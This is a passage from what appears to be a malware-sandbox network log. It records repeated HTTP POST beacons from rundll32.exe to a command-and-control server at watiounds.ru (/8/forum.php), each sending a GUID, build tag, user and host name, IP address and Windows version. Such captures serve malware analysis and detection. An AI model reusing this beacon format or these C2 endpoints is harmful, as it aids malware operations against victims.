                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          254 | 192.168.2.22 | 49419 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:19.427859068 CEST | 319 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:19.552073002 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 42 59 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTBYGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          255 | 192.168.2.22 | 49420 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:19.885044098 CEST | 320 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.013376951 CEST | 321 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          256 | 192.168.2.22 | 49421 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:20.344010115 CEST | 321 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.468288898 CEST | 322 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          257 | 192.168.2.22 | 49422 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:20.776747942 CEST | 323 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.902153969 CEST | 323 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          258 | 192.168.2.22 | 49423 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:21.226422071 CEST | 324 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:21.355878115 CEST | 324 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFFUUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          259 | 192.168.2.22 | 49424 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:21.675112009 CEST | 325 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:21.801229000 CEST | 325 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFBYUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          26 | 192.168.2.22 | 49191 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:35.106446028 CEST | 64 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:35.228140116 CEST | 64 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          260 | 192.168.2.22 | 49425 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:22.127002954 CEST | 326 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:22.250658989 CEST | 326 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          261 | 192.168.2.22 | 49426 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:22.584753036 CEST | 327 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:22.707726955 CEST | 327 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKQJPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          262 | 192.168.2.22 | 49427 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:23.030031919 CEST | 328 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:23.154145956 CEST | 329 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQCXJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          263 | 192.168.2.22 | 49428 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:23.483021021 CEST | 329 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:23.609416962 CEST | 330 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYNMBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          264 | 192.168.2.22 | 49429 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:23.937474012 CEST | 330 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.068602085 CEST | 331 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          265 | 192.168.2.22 | 49430 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:24.392395020 CEST | 331 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.523158073 CEST | 332 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKVEPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          266 | 192.168.2.22 | 49431 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:24.855385065 CEST | 333 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.998523951 CEST | 333 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKZAPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          267 | 192.168.2.22 | 49432 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:25.324019909 CEST | 334 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:25.447189093 CEST | 334 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cATGZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          268 | 192.168.2.22 | 49433 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:25.759485006 CEST | 335 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:25.883337021 CEST | 335 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          269 | 192.168.2.22 | 49434 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:26.198023081 CEST | 336 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:26.321511984 CEST | 336 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJHSQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          27 | 192.168.2.22 | 49192 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:35.561132908 CEST | 65 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
